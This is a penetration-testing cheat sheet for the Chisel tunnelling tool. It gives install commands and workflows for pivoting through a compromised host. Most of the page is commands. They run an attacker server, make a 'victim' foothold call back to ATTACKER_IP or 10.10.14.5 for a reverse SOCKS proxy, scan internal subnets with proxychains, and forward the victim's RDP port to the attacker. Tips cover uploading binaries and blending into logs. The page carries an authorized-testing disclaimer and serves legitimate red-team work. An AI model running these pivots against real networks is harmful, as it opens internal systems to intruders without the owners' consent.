CyberCheatsheets

Chisel Cheat Sheet

Fast TCP/UDP tunnel over HTTP(S) for pivoting through compromised hosts when SSH is unavailable.

Exploitation & PayloadspivotsockstunnelUpdated 2026-06-02

Overview

Chisel creates encrypted tunnels over a single TCP connection. Typical pattern: attacker runs server, victim runs client with reverse SOCKS or port forward — useful for internal network access through a web shell or foothold.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

Download release (adjust arch)

wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
gunzip chisel_linux_amd64.gz && chmod +x chisel_linux_amd64
mv chisel_linux_amd64 /usr/local/bin/chisel

Go build

go install github.com/jpillora/chisel@latest

Essential commands

Attacker — server (listen)

chisel server -p 8000 --reverse

Victim — reverse SOCKS proxy to attacker

./chisel client ATTACKER_IP:8000 R:socks

Common workflows

Attacker

chisel server -p 8000 --reverse -v

Victim (foothold)

./chisel client 10.10.14.5:8000 R:1080:socks

Attacker /etc/proxychains.conf → socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 172.16.1.0/24
proxychains curl http://172.16.1.10/

Forward victim's 127.0.0.1:3389 to attacker 13389

./chisel client 10.10.14.5:8000 R:13389:127.0.0.1:3389

Attacker

xfreerdp /v:127.0.0.1:13389

On victim: forward local 8080 to internal wiki

./chisel client 10.10.14.5:8000 8080:172.16.1.20:80

Auth and fingerprint —

chisel server -p 8000 --key 'supersecret' --reverse
./chisel client 10.10.14.5:8000 --auth supersecret R:socks

Flags reference

server -p PORT

Listen port

server --reverse

Allow remote (R:) forwards

server --socks5

Enable SOCKS5 on server side

client HOST:PORT

Connect to server

R:local:remote

Reverse forward (needs --reverse)

L:local:remote

Local forward

-v

Verbose

--key

PSK authentication

Tips

  • R:socks is the most common engagement pattern with proxychains.
  • Upload static binary matching victim arch (amd64 vs arm).
  • Chisel uses HTTP — may blend better than raw SSH but still visible in logs.
  • Compare with ligolo-ng (TUN interface) and ssh -D for cleaner routing.

References

Aide-mémoires similaires